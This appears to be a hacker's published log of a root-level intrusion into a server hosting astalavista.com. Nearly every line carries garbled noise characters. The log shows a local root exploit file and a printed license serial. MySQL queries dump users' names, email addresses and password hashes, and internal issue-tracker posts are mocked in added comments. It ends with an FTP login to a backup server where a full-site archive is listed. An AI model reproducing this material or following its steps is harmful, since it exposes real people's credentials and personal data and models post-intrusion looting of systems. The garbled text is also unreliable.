3 \' L* @1 \: l0 \1 } e5 pdrwx–x–x 10 com com 4096 Apr 28 12:40 . b/ J2 J& b+ H& T+ f! g4 p
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: v0 I2 M, ~0 v( H; N. vdrwx—— 2 com com 4096 Jun 4 04:04 backups
% q" |) a* C& z# X" J-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
; C1 _2 \1 O& W8 E3 Edrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
8 b0 H7 C' ~# ^- {-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
* {' ?+ v( E( ?% c! i/ ^-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout) L/ S. P" n& o% J
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
" h% `7 C' I& ]( c-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
5 L: h& y6 b1 t' o% pdrwx–x–x 3 com com 4096 Jan 29 2008 domains
7 w) } o# g' a4 ^* b-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed$ e- T% p" ?" m% P
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap" ]0 m2 ?0 _0 [/ r5 G. P+ w& X
-rw——- 1 com com 69 Nov 18 2008 .lesshst4 a( n s) V {& x1 @
drwx—— 2 com com 4096 Sep 24 2007 mail
9 r5 N2 z8 d5 r5 }& y. C-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
( j6 ~) y% s- qdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp- X% J0 n3 G, p) ^' z' z
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
% c7 g5 i+ H! p( ~- O! G-rw-r—– 1 com mail 34 Sep 24 2007 .shadow% F" a5 Y0 O% `- G
drwx—— 2 com com 4096 Aug 26 2008 .ssh) C6 c. L7 N& m3 ?9 ~
-rwx—— 1 com com 8515 Feb 10 2008 t
# G: V* _7 P( u. A( E' D) h u-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c& ~+ k* B* H- y0 g' E9 E- D9 l
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
" X4 f6 f7 {) S- X8 g. J-rw-rw-r– 1 com com 617 May 20 2008 .toprc
) p& |7 t7 z- d4 U-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
) P: w" Q7 [' b1 w-rw——- 1 com com 16629 Mar 28 21:46 .viminfo" P7 C: P& N# v) d5 ?" N( e' L7 g
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc" u# q+ b# K8 ~7 ^8 P& W1 J
: u8 c; e0 z+ L2 }1 M0 Csh-3.2# head t.c0 G* W S! j0 g% j$ N1 v; j
/*3 P( S, v, U5 P3 P4 r4 U" L; K" x
* jessica_biel_naked_in_my_bed.c
; v: P7 R: B3 k+ c2 H*
) J0 a7 j a. {: y* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.. A, k) i. |7 I3 ^/ B& B: O0 w
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.* L) [9 s/ j- w: D" G5 D) n
* Stejnak je to stare jak cyp a aj jakesyk rozbite.6 ^; h( x* }! T
*
: {( h" X, A' \: e6 }. j+ e/ d0 r* Linux vmsplice Local Root Exploit% n2 p" Z" @( m4 s3 o0 i$ j
* By qaaz1 L6 g" m5 y {! H& D0 z( c+ }
* s4 @) t: i; V; q. K$ d% ^
( W& t2 r) y h& j; X' vsh-3.2# cd /; }' T" L( P+ W
sh-3.2# ls -la
/ g# y8 f$ [% A2 V: r; O( Rtotal 360
, j; X; ?, t4 [ edrwxr-xr-x 25 root root 4096 Jun 3 02:43 ./ ]5 d9 Z/ z% o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 y3 t) n1 X( C5 `8 ]: j-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
, v7 o8 g: u9 j. _/ \-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
1 r6 F9 b" U; k1 V( i2 x2 n; A-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db$ [& A2 F' I+ ^% j9 I9 v) T
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
2 h6 p& m" m/ `4 k-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel7 U( ^ T5 Z- {
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup/ \0 i0 A# q- x) Y" r
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
' i$ V9 e, p: B4 W6 |2 k' m: mdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
$ k' B; v9 y: B2 G; Jdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev- m* n' P: c: [7 Q
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
# e: K+ s' d+ o3 Kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
% L5 D5 E; E- n0 J2 u* g-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
( ?$ b: B+ R; K8 e0 idrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib6 g3 `0 _8 {$ J- P" q
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64, Q' ]: M+ f7 ~( W
drwx—— 2 root root 16384 Sep 11 2007 lost+found
1 }5 C6 F+ ?( L& @) `8 C( \drwxr-xr-x 2 root root 4096 Mar 11 17:56 media& V! N" \1 U% x* g
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
& d0 g7 m9 |' l. L' F. ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
# E- N) p" l3 f6 A-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
1 u+ p! Z8 n5 R: n% j% {drwxr-xr-x 2 root root 0 Jun 3 02:43 net1 H% \% B6 w8 v7 u- A
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt* ?) E/ z' S2 b: g Z
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc2 O0 x& a6 P. C' _7 F% D
drwxr-x— 15 root root 4096 Jun 4 08:40 root
' u3 d* j- x8 x! ]drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin! s% t; o9 |% ]" F9 U* I1 w
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
+ n Q0 f/ E7 P9 w+ f% }0 A' gdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
& p5 Y% E2 o' }drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
! W: k. @# u/ l: O+ k. r# wdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
4 r6 H/ X- Y$ j' d2 ldrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
0 R9 p9 f! s4 D" Sdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var, U4 B K' [ @$ O9 b. F
7 \( c- \7 X& R- a' ish-3.2# cd opt7 k" X. r% @. G- m/ {
sh-3.2# ls -la" g% g; ^! K \- r6 r1 F5 m
total 209 W5 N' g7 E' z( a8 N+ F7 W
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .: W" _- ]' v# n+ N
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! M$ R- q" y& c9 m6 |
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws( ]: j' J$ b2 \, z. p( e: O
9 s' {6 C) O; v7 R0 l
sh-3.2# cd lsws/! D& T' j0 E- S2 ^
sh-3.2# ls -la
) j, ?: T: E( g6 ?8 E9 wtotal 1084 u6 t) `$ o+ P& C+ [
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
2 p* G/ E5 l B1 G# o' }* O4 kdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..1 [! ?7 g$ @+ `% X M
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
( c: h6 l+ J; @6 O4 Rdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
+ b, q: e' d8 j* ~1 idrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate. _8 T) o9 i/ W
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
& Z+ b# v+ } ^2 Odrwx—— 4 apache apache 4096 Jun 3 02:43 conf0 D, q+ ^, x _( y6 D9 L% o
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT% r8 X4 v* B# U% E9 J; ~/ j
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
' {# S1 ?+ t2 M. Y$ l d C- J3 `drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
0 E% H9 @$ y3 h8 H/ N" i; Hdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
4 [8 j3 }1 e3 L8 A9 l/ p$ I. J-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
3 o) a+ z6 | b# l6 i-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP9 q) o" N0 P7 e
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL* T, E( x0 W2 R: X8 a4 z1 ^* ^
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP* q8 e6 f. y" c% D
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
8 {! ]* C7 v$ }. k% o" Udrwxr-xr-x 2 root root 4096 Mar 20 2008 php% X4 b" d# T0 v% ~1 y
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
' ~% e- l! C5 e1 a0 R- {8 _+ ?drwxr-xr-x 3 root root 4096 Mar 20 2008 share0 D7 A: u$ Y! B$ O
-rw-r–r– 1 root root 6 May 29 15:10 VERSION. w# P' ?1 R2 J7 l9 B7 W1 r5 j
4 {+ {( @* w- T: { I/ U$ l; w
sh-3.2# cd conf
5 ^, N# g5 {9 e) l osh-3.2# ls -la5 W, j: i% `( M) k
total 485 |& S* M e, w4 x
drwx—— 4 apache apache 4096 Jun 3 02:43 .' D* I, J% p H: h* b& {
drwxr-xr-x 15 root root 4096 Mar 20 2008 .., V7 P" m4 c8 M. h# @+ T
drwx—— 2 apache apache 4096 Mar 20 2008 cert7 ~! \" W6 W- h
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml/ y: R" |. w# N; h
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak# @) n1 J) r9 Y' l# Q- _9 ?! m7 R
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
: i. Y" e' W* p( C+ |+ v-rw——- 1 apache apache 256 May 29 15:10 license.key
. R# L! V0 P- N2 z0 s! ^2 g8 ~-rw——- 1 apache apache 256 Mar 21 2008 license.key.old N, v: m0 C+ V9 q5 p
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
e2 T0 F$ {/ |- Z2 ?-rw——- 1 apache apache 20 May 29 15:10 serial.no
+ S! f5 x0 X! r. M7 m7 b' tdrwx—— 2 apache apache 4096 Mar 20 2008 templates
' h9 E- o$ P F" k! P
9 G+ W# e6 O0 N% L$ Jsh-3.2# cat serial.no
+ ^* x' V, M) D" C' P; R$ ]; P7 @IbDl-oVsO-CKqL-wVRa% j. v; [' D, J
( |4 w. @" n8 V8 Psh-3.2# mysql
' F. X7 j: G1 o% O R- eWelcome to the MySQL monitor. Commands end with ; or \g.
- y( m' Z+ [. Q$ Q! F& O. g% ~5 qYour MySQL connection id is 286844
) q* V9 b* `* o. [" pServer version: 5.0.45-community-log MySQL Community Edition (GPL)4 X$ O) N. a' O/ q; `9 @ t( v
" c/ p) ^8 i$ t, ]' F* i- ?* LType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
/ W( L, A$ V' n7 H" {: A; U' b1 {3 G$ a) A3 ]9 ?" _
mysql> show databases;
: e: Y; [- b j# T- r' a+———————–+; D3 v# i. G% K
| Database |
7 Z" P }, P- k! [" o+———————–+
$ E9 A1 v. g6 T! K6 e| information_schema |2 d2 w0 C, ^+ n( D7 E& W( I$ Y& _
| astanet_ads |1 Z+ v6 a# m) A
| astanet_mailing_lists |
0 H% x) \6 v8 u3 T/ v2 A# k| astanet_mediawiki |8 U9 u1 t" b$ v% K- h# {* ]+ \, I
| astanet_membersystem |
8 t6 k( G+ R% s2 p4 k| com_contrexx |
2 _" M5 ~4 e% w" d* m2 h D| com_contrexx2 |
" n* U% b8 ?" N: L3 t0 O| com_contrexx2_live |* f3 ?% e! ]2 K& h! [: [9 B. k
| da_roundcube |% m# i" u8 k$ p: g
| dolphin |9 d! m9 V( {7 K! ? a1 @
| ideapool |
1 M# q! C: Q3 ?# E| mysql |& E+ O' y% i( e9 `8 K
| test |
* t+ {6 n5 _8 r. v' p+ A| yourmaster |2 K5 Q. W$ {8 l- V! \) z
+———————–+/ w. w$ G. R, i T, i$ F
14 rows in set (0.00 sec)/ g" Y6 s- b7 u
2 c2 h" h' i$ x" e1 Pmysql> use ideapool
; J+ h3 `9 U% g& _3 e1 F4 xDatabase changed
C- X: X" O' Q1 L2 d& Xmysql> show tables;
. B5 C/ C+ k; d; Q1 F( H- z( \+———————————–+
* y' Z# v, \' [4 W+ l* t| Tables_in_ideapool |
/ w0 q4 t1 E0 [8 X ~) i+———————————–+& ^7 b- S& w/ t& V9 f0 \; M
| eventum_columns_to_display |. W+ }2 R6 R; l$ G; f
| eventum_custom_field |
) c/ G' X. G: e. K| eventum_custom_field_option |& X5 F8 C+ t& O9 c
| eventum_custom_filter |; w' U! M/ f2 c/ s, r$ O0 J' C
| eventum_customer_account_manager |
/ {) A) E `3 l& f| eventum_customer_note |
/ \5 t5 A/ D7 U/ X6 p, A; ^: n| eventum_email_account |7 F+ i% g7 J8 Z! Z6 @0 `
| eventum_email_draft |. A0 ?" }+ U- L) L4 S! Y! D
| eventum_email_draft_recipient |
- b/ x. H3 ?, M* k1 p* x0 N| eventum_email_response |
, i( d/ R0 @, s/ f- R- {( x/ U- k| eventum_faq |% x1 s1 z0 H" j; F# f9 k
| eventum_faq_support_level |2 B0 D$ S, H' N% b/ D
| eventum_group |
& {7 a1 Z# W# R9 L% v# |) [4 `| eventum_history_type |
0 \; J, a" M, n% ^. Z+ @) E! ?| eventum_irc_notice |
+ ` _- U7 o% x9 d8 N. t| eventum_issue |
8 {. ?& O* F/ r: }| eventum_issue_association |! b+ t; y. i" i
| eventum_issue_attachment |# A( z. z8 s, t- L) R; M
| eventum_issue_attachment_file |
0 H8 b M$ J/ K# K| eventum_issue_checkin |* D; K/ t) j: {+ V4 J: P+ n k
| eventum_issue_custom_field |* p/ u5 ?9 m) R- @& F) x) A' n
| eventum_issue_history |
- E. H: w0 E V: n/ N% j| eventum_issue_quarantine |
! t3 ^7 y$ A" S| eventum_issue_requirement |! _( a( B& ]" _) D
| eventum_issue_user |$ \7 _8 X5 o- w9 P5 ~2 a; v9 \
| eventum_issue_user_replier |3 N8 i! i$ e K4 H ^: X
| eventum_link_filter |+ f3 j) V2 C2 g+ m7 G
| eventum_mail_queue |
+ R5 v9 A$ X4 T7 v( L! g" J| eventum_mail_queue_log |2 e$ Y" q: y0 |1 P# W
| eventum_news |
, j5 K8 A ~# G( _* Y* U) k) z0 [| eventum_note |
; ], u% M6 y) E" m+ Y' T4 ^& V| eventum_phone_support |2 u, }( C' }) u& I9 H6 T* Q
| eventum_project |7 M* ^+ ~, o; n7 A
| eventum_project_category |
/ F' m& V+ [% l; e' R, q; _| eventum_project_custom_field | D4 [! {$ H; D' @" e! S$ T
| eventum_project_email_response |0 Q. r+ }5 X) z, p; @
| eventum_project_field_display |! U" k5 E) j+ K4 X( g& [# y+ l$ r
| eventum_project_group |
$ m+ ?8 ^/ l! z* }2 P* I4 a F| eventum_project_link_filter |2 P0 \# d% `9 h) b: b) M' R
| eventum_project_news |6 M3 @( Q" o% u; W0 G$ ?% a. k0 [* l
| eventum_project_phone_category |- l2 v9 k# H! @4 w
| eventum_project_priority |
6 o; z9 K7 p0 N% |1 ~' ]/ i| eventum_project_release |
0 r* x* E {+ z+ a| eventum_project_round_robin | O1 Q8 S) G! z: N( ^& p# A
| eventum_project_status |* R, k6 _: E/ e& n5 \( x
| eventum_project_status_date |
# T0 A) v/ g" || eventum_project_user |. N% t! ?2 G' R7 J" g+ N- b
| eventum_reminder_action |
) t) P, k' N9 }# q| eventum_reminder_action_list |
5 j% n% W+ [" O: H7 N1 D| eventum_reminder_action_type |. h8 `9 o9 R! |0 f1 n
| eventum_reminder_field |
# P# q, o. J# c0 _| eventum_reminder_history |: a1 F' q$ Q' p$ |
| eventum_reminder_level |: N& E1 q" J; D2 i! U" A
| eventum_reminder_level_condition |
& H) @+ K! M0 Y7 Y| eventum_reminder_operator |1 U b4 |3 M; ^; V8 B
| eventum_reminder_priority |
* o5 r; z) G& @| eventum_reminder_requirement |
9 X7 c+ e/ ]0 u; D+ Y| eventum_reminder_triggered_action |. R, B* m" @5 B' Y" o
| eventum_resolution |# F. d1 L5 n5 v: V. [ y
| eventum_round_robin_user | H' p. r% |; S3 \) Q2 v6 t
| eventum_search_profile |0 j2 P4 k7 N& c: E9 _
| eventum_status |
' n8 U a% N" q6 p, w y8 s; @| eventum_subscription |
4 J( m3 P* ?! N/ Q: P& Y| eventum_subscription_type |
; l9 s6 z) E2 Y, w| eventum_support_email |( `7 @& y0 D' T7 o1 Z N; q
| eventum_support_email_body |# F: T7 Q9 s9 t% a7 `' Q5 q
| eventum_time_tracking |8 S$ \; k. C5 ^4 _: M0 [
| eventum_time_tracking_category |
) k" g2 T1 K- ?4 _' t9 [| eventum_user |& e& M, S# l/ s- c! ~
+———————————–+) w8 k4 z! f' |4 V
69 rows in set (0.00 sec)
6 F8 J4 J/ g* M7 o! N3 Q
' y& N6 a; M. j4 R( gmysql> describe eventum_user;2 N: }4 P- j+ w/ w: D* I2 t& ]! p5 o
+————————-+——————+——+—–+———————+—————-+) n: T! Z2 g5 v- I6 }
| Field | Type | Null | Key | Default | Extra |
1 t1 \8 w8 M4 }& ?0 u6 K+————————-+——————+——+—–+———————+—————-+
+ y/ e' n) ^' Z) s0 s| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |0 ` \6 p, i M" p
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |% ~/ z( U9 X3 n% C' q* E* |
| usr_customer_id | int(11) unsigned | YES | | NULL | |+ B8 a1 G# L9 D2 k) W* o
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |/ d C2 C# L0 R& w. p6 [) f. |
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |: b9 a" V' d+ c& D, O
| usr_status | varchar(8) | NO | | active | |& m7 Y' ?: @$ f* [' E- l
| usr_password | varchar(32) | NO | | | |
+ y/ H, [$ i7 z9 u& e' w| usr_full_name | varchar(255) | NO | | | |
- Q4 g+ V# z* n# i4 | D+ U| usr_email | varchar(255) | NO | UNI | | |
# Y W1 M7 ?, j) z1 m0 u' K| usr_preferences | longtext | YES | | NULL | |0 {9 o+ h* u) J& K5 Q* Y) }( j
| usr_sms_email | varchar(255) | YES | | NULL | |
Z! E( [. l3 \; D( o" e5 W| usr_clocked_in | tinyint(1) | YES | | 0 | |0 q/ H% G' K! t8 w7 K
| usr_lang | varchar(5) | YES | | NULL | |2 `6 D% f. C4 N) A9 i, _
+————————-+——————+——+—–+———————+—————-+
. b" d+ f1 Z# H; @/ W4 h13 rows in set (0.00 sec)4 e# ~ f/ H' N/ C' E# S3 N: y8 d9 F$ g
9 N g7 H" u7 R' b" d$ j- T9 @1 m Ymysql> select usr_full_name,usr_email,usr_password from eventum_user;8 r8 h: E+ n# V
+———————-+——————————-+———————————-+
- a E$ s$ F" d' D- `6 J| usr_full_name | usr_email | usr_password |
6 j6 }) c+ }; s' U+———————-+——————————-+———————————-+
; d% T2 l$ r5 Y7 }/ Q+ x: u$ T| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
, p/ T- u+ o5 [| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
# z5 O2 S4 g) k/ A) x| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
+ m" m T: C! z' t- O' x9 J8 u| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
9 Q" L S0 ?" \3 `9 Y' h| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |; [4 f/ z# E9 S6 F B* u+ g
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
% \0 n5 t3 R/ c% j| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |! p1 ^( _( V# n& } p! `" w
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
% l q% \: r$ Z N4 W% m# |. m| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
% K1 C% I* w' [7 `4 T| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |/ h! K* b) x9 F. O- ]7 t
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
4 J. b- Q( d) _| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |9 H9 v( f: e% Y/ Q& B. i
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |0 t( P, `9 p' G: n& ?0 p Z
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
9 c* R) v( s: x$ u| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |7 R1 ^+ U# L0 q) K: B6 S. L$ u" g3 _
+———————-+——————————-+———————————-+1 u; ]# |7 F2 A( q
15 rows in set (0.00 sec)
& x" b6 u) ^: } f; T/ M/ R5 p/ ^- `0 p# D1 Z& G
mysql> select iss_description from eventum_issue where iss_id = 43;
; ]( B8 o5 G( ?4 U; ^ x+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
. K, J; d' N- C! h( E; j4 l| iss_description $ n1 ?/ `( @ K3 X4 S$ r( z7 m: g& a
|
: N, e/ I9 d+ {4 L0 ?+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
/ g5 Y* B! d# v& \; Q! o| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be" v/ u. U0 l) t; m1 V. m
connected for 90 mins… 120mins… so what i propose is something like:
Q! _# w: \1 m- t5 s3 y5 P# k链接标记[url]http://www.surfthechannel.com/[/url]
6 Q4 z$ v- d6 N" _( X- asince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
! i% P7 v- ]! v' |like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
" D7 t; ]5 L" p; {' z/ c3 Obreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
0 t% D+ U' Q* e ?if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
6 w g" {% R: Z8 _- l: O {5 h2 W' S T" \
We could also put advertisement during play on the flash video player itself… extra $$…* b5 C+ Y' S$ E1 y; S$ M2 \( I
( f E( x7 g* s- vBy sykadul |+ c/ x0 i4 T% y! N2 L
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
" O6 C/ @$ Y8 x* [1 row in set (0.00 sec) f2 W/ a/ ?% L: A `, j5 S; y% S
( A8 s, G4 {7 r// Money and extra $$ is all they care about. remember that.
- V3 f* s3 c2 l3 N/ {7 s; W+ Y1 J# }! T$ b" v- {
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;9 r( X$ {4 p- d$ Y- A
+————————+——————————————————————————————————————————————————————————————————————————————-+
4 }. t9 H$ X L; N" \| iss_summary | iss_description ( g% |8 G% i& e
|2 W2 ~: {" C3 u M, p! p0 B
+————————+——————————————————————————————————————————————————————————————————————————————-+
( [5 o9 \0 R L8 \- x& D| Forum for REAL EXPERTS | Hello,
& a9 T) z$ `, z* c2 t# ], A$ ~& ?, t( D6 R& t
Ishtus and I,
( k- Q) u+ C% e y$ k$ K2 C# C6 T
/ t7 q/ I; A4 \' gCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
6 l( W0 g# ~! C3 HONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
4 f) l/ c- H) \6 S7 w/ v5 }6 }5 {! j. A w
One example a friend of mine from coresecurity.com!6 d) v, \0 h: L
3 P N) V( d/ J0 r+ R* bWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..2 X, V8 ^) E# n w! G! m: f6 x$ Y9 E6 @7 f
2 ?& c5 L& z% P' q8 B
|
* \7 L) Y8 ]% Z& |+————————+——————————————————————————————————————————————————————————————————————————————+
0 I0 E' q( q: }+ ?7 m+ P/ H1 row in set (0.00 sec)3 ?* U$ c0 e9 q2 t; i6 e6 z
, W! Y, z/ \- n8 x9 v4 O// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
3 p& Y& r# n6 s$ B' r
9 h- K, f! l8 ^3 j! U" e& h4 Umysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;% ]- z" [; C1 n0 E7 p* H4 c
+——————+———————————————————————————————+
" T2 c1 s& t' o6 n8 ~" N8 D| iss_summary | iss_description |, h# ]# w0 l) B$ Q! k$ ?: u
+——————+———————————————————————————————+6 H& }( a! b$ {
| Website guidance | Virtual Girl which guides you trought the website.( d5 J8 b! e' F @
' i7 U7 T, Y' s% B
We need a girl with who you can ( talk )!!!4 `. I% y# G. F
Also for the News!& \) {. h c3 C+ |; T% V# Y' [1 p
So my suggestion is a girl who read you the news loud if you like!
3 W$ \, h7 e; ~3 Fyou can choose between read yourselfe or she read it for you or both!
8 _/ U- \5 D0 l9 ?
' H+ p6 U2 F {% ~! _/ [! YGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
7 m; b( m9 }! A" t6 I+ ^, z. i A. X. J" P2 @
Have a look on the example girls!!5 y/ t8 M! F6 f* d) t" W
! ` V K& R( `+ i$ `! i. z3 t- N
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]3 Q$ m. H9 w% |, ]9 W/ N% K
+ R# @2 [8 d; L- [) F2 V
or that, D9 S. I$ T% S/ V S, l3 T
x. P$ K* ?2 d" {5 p0 N4 Q2 W$ |
链接标记[url]http://www.yellostrom.de/[/url]
2 m$ T) f+ a2 y& h2 x7 n, [2 d8 i" P( V" \( |" L4 ^
|
+ ?; ?0 D( G2 e+——————+———————————————————————————————++ \4 W: E3 f3 ~+ w/ U
1 row in set (0.00 sec); a% K% V/ |4 Q7 m
! C4 f$ `& x- Q5 ?3 p( F. w// ha ha.
8 W c0 h: ?6 _2 y: F" ]! H6 {( r8 _9 k1 h5 o) I$ [) d
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;3 o0 r/ k6 @) Z% t$ Z
+————————–+———————————————————————————————————–+
6 E& c9 Q" d2 o. d( D0 h8 ~# a3 [| iss_summary | iss_description |
% c" I7 S J3 q7 \: M$ q+————————–+———————————————————————————————————–+
i& B/ {/ c! Q) Y| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
l. L) `' n" }9 S( H+ W+————————–+———————————————————————————————————–+; l0 A% W- ]0 J" X
1 row in set (0.00 sec)% o/ y" L% H: w3 O7 f5 g+ V
$ n3 i( h1 h) H
// LOL.7 K* L( n: B, Y* `9 B" Z
5 ^1 b7 Z5 L& a1 Qmysql> exit( G* ]8 T% x% Q! m% `
Bye
3 N# x' G' Z2 |8 l- Y( S
0 V6 Y8 ~5 W1 J& Y/ r. n$ @sh-3.2# ftp 212.254.194.163
- t) B; [0 ~% QConnected to 212.254.194.163.2 l* l ]; z' i, b4 z
220 BackupCOM_VW FTP server ready.4 S# P; e& U$ v) O: k( _
504 AUTH: security mechanism ‘GSSAPI’ not supported.
" y t T4 n' N# E504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.$ ]) f f+ |, i+ M" W! e# H/ \
KERBEROS_V4 rejected as an authentication type& f- o9 m- ?1 [2 T
Name (212.254.194.163:root): astalavista.com, l% X1 i2 J) k% o) k! p$ }3 m2 V# X# W
331 Password required for astalavista.com.
8 t: C. S& D9 Z. X/ J1 b. mPassword:
, }+ Z, ?% e9 D" c; s! d' u$ \230 User astalavista.com logged in.
5 j/ n; @- M; p/ t& rRemote system type is UNIX." a* O: C5 [* g7 g6 E: \6 b9 S
Using binary mode to transfer files.
- H) b; t* }+ ~6 ]- s% Qftp> ls -la
# O0 L7 L4 X$ a* K2 v6 @+ S227 Entering Passive Mode (212,254,194,163,2,188)& @8 p. [7 U! M2 ]' A& J
150 Opening BINARY mode data connection for ‘file list’.
4 [0 b% N6 w4 ~- ]% \6 E5 {- e+ y, M: ^dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com! C+ s4 _/ i2 x( @. W" |8 i
226 Transfer complete.
2 e2 |5 u! a8 E- jftp> cd astalavista.com
' ]) `9 B0 j3 Y1 Q7 m B, ^250 CWD command successful.
+ o7 J/ R9 x1 P& Tftp> ls -la8 K( G( v# W& Z+ S* j
227 Entering Passive Mode (212,254,194,163,2,189)/ [: J7 l+ n: E' C8 s
150 Opening BINARY mode data connection for ‘file list’.
9 K9 f0 g& j$ w* a-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
